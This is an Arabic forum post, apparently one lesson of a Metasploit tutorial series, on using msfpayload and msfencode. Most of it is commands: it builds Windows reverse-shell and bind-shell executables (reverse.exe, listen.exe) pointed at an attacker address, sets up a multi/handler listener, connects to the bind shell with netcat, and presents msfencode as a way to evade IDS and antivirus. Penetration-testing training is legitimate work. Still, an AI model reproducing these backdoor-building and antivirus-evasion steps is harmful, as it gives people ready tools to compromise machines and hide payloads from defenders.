Admin Admin
المساهمات : 149 تاريخ التسجيل : 15/07/2013
| موضوع: الدرس الرابع : استخدام msfencode , msfpayload الثلاثاء يوليو 23, 2013 10:29 am | |
| [b style="font-family:Arial;font-size:16pt;font-weight:bold"][b style="font-family:Arial;font-size:16pt;font-weight:bold"][b style="font-family:Arial;font-size:16pt;font-weight:bold"][b style="font-family:Arial;font-size:16pt;font-weight:bold"]السلام عليكم ورحمه الله وبركاته
اليوم درسنآ يكمل الدرس السابق .
1- msfpayload
msfencode -2
msfpayload : اداه مهمه لعمل الـ shellcode
الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه
سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA
طريقه عمله . [/b][/b][/b][/b] كود PHP: - الكود:
-
./msfpayload payload var=val
payload = اسم البايلود
var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم
كيف نعرف متغيرات الـ payload ؟
نعرفها عن طريق الامر
كود PHP: - الكود:
-
./msfpayload windows/shell/reverse_tcp O
الصوره تتكلم . local port= lport البورت الخاص بالمهاجم , local host = lhostip الخاص بالمهاجم خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lportbind_shell الحصول على شل بأتصال مباشر reverse_shell الحصول على شل بأتصال عكسي الان نعمل تطبيق . كود PHP: - الكود:
-
./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C
[/QUOTE] الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload , البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe كيف نعمله على صيغه exe , بأستخدام mfspayload . مثال لعمل exeكود PHP: - الكود:
-
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
طريقه التنصت للاتصال
./
كود PHP: - الكود:
-
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
msfcli راح اشرحها بدرس القادم .
مثال اخر كود PHP: - الكود:
-
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
الان راح نستخدم netcat
nc -vn 192.168.1.2 4444
~~~~~~~~~~~~~~~~
msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV
كود PHP: - الكود:
-
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer
-x <opt> Specify an alternate win32 executable template
الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز . [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الان بقى الواجهات 1-msfconsole msfcli -2 msfgui -3 msfwe b -4 وراح يتم التطرق لها بالدرس القادم . قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس ! لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟ كود PHP: - الكود:
-
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
الان راح نستخدم netcatnc -vn 192.168.1.2 4444 ولماذا > متعوب عليها استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض ! كود PHP: - الكود:
-
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
طريقه التنصت للاتصال
./
كود PHP: - الكود:
-
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
الجواب راح تلقونه بالدروس السابقه اذا كنت متابع hint: الجواب 5 كلمات | |
|